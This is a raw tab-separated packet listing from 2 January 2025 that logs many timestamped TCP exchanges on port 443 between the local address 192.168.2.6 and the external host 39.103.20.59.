Jan 2, 2025 12:14:13.566157103 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566196918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566200972 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566225052 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566257954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566268921 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566273928 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566277981 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566313028 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566324949 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566333055 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566337109 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566361904 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566366911 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566390991 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566394091 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566415071 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566437960 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566586018 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566622019 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566632986 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566637039 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566663980 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566673994 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566709042 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566761971 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566899061 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566930056 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566947937 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566952944 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.566968918 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.566998005 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.662620068 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.662873030 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.663343906 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.663405895 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.665195942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.665265083 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.669074059 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.669135094 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.670800924 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.670857906 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.674518108 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.674598932 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.676348925 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.676412106 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.678242922 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.678298950 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.682065010 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.682126999 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.683818102 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.683876038 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.687709093 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.687772036 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.689508915 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.689568996 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.691236019 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.691293955 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.694998980 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.695071936 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.696731091 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.696795940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.700267076 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.700330019 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.702183008 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.702236891 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.705795050 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.705868959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.707603931 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.707667112 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.709333897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.709393024 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.712928057 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.712990999 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.714716911 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.714775085 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.718388081 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.718425035 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.718452930 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.718482971 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.718501091 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.719257116 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.719305992 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.719322920 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.719367027 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.722798109 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.722861052 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.724551916 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.724606991 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.728058100 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.728115082 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.729784012 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.729837894 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.731493950 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.731549025 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.734961033 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.735025883 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.736774921 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.736833096 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.749229908 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.749295950 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.749315023 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.749356031 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.749375105 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.749754906 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.751966000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.752012968 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.752033949 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.752039909 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.752055883 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.752082109 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.757571936 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.757616997 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.757643938 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.757651091 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.757679939 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.757699013 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.763129950 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.763176918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.763204098 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.763210058 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.763222933 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.763248920 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.766896963 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.766948938 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.767039061 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.767112017 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.772478104 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.772535086 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.772535086 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.772546053 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.772583008 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.777980089 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.778062105 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.778121948 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.778175116 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.783480883 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.783520937 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.783545971 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.783560038 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.783575058 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.783597946 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.788976908 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.789051056 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.789122105 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.789170027 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.792455912 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.792498112 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.792517900 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.792534113 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.792546034 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.792574883 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.797835112 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.797924995 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.797951937 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.798008919 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.803208113 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.803257942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.803293943 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.803301096 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.803317070 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.803347111 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.806034088 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.806096077 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.806169033 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.806215048 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.811225891 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.811286926 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.811376095 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.811431885 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.814758062 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.814809084 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.815481901 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.815526009 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.820053101 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.820143938 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.848432064 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.848520994 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.885677099 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.885785103 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.888442039 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.888509035 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.889874935 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.889941931 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.892899036 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.892951965 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.895132065 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.895191908 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.896884918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.896938086 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.900104046 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.900154114 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.902048111 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.902108908 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.904879093 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.904937983 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.907257080 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.907347918 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.909919024 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.909985065 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.911531925 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.911597967 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.913717985 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.913774967 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.916441917 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.916507959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.918796062 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.918859005 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.921408892 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.921477079 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.923533916 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.923602104 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.925275087 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.925345898 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.927705050 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.927763939 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.929943085 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.929990053 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.932626963 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.932686090 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.934648037 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.934715033 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.936419964 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.936480999 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.937614918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.937678099 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.939666986 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.939721107 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.940994024 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.941051006 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.943233967 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.943306923 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.945779085 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.945837975 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.947170019 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.947227001 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.949238062 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.949297905 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.951678038 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.951730013 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.953690052 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.953743935 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.972173929 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.972259045 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.975078106 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.975116968 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.975131035 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.975142002 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.975156069 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.975178957 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.979950905 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.979988098 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.980005980 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.980016947 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.980035067 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.980052948 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.989305019 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.989353895 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.989375114 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.989381075 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.989408970 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.989427090 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.990462065 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.990520954 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.990552902 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.990557909 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.990582943 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.990597010 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.993901014 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.993938923 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.993956089 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.993961096 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.993993044 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.994008064 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.998842955 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.998878002 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.998900890 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.998905897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.998933077 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.999001026 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.003220081 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.003279924 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.003387928 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.003449917 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.008115053 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.008179903 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.008266926 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.008320093 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.013020039 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.013068914 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.013072014 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.013079882 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.013143063 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.016746998 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.016788960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.016803026 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.016808987 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.016865015 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.016865015 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.021378040 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.021451950 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.021478891 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.021483898 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.021517038 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.021534920 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.024147987 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.024230003 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.024231911 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.024243116 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.024272919 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.024288893 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.027884007 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.027918100 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.027940989 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.027946949 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.027971983 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.027988911 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.032706976 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.032757044 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.032768965 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.032773972 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.032803059 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.032820940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.036052942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.036088943 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.036128998 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.036133051 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.036160946 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.036179066 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.097687006 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.097769022 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.100099087 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.100163937 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.102005005 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.102086067 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.105499983 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.105566978 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.107114077 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.107171059 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.108720064 CET	443	49984	39.103.20.59	192.168.2.6
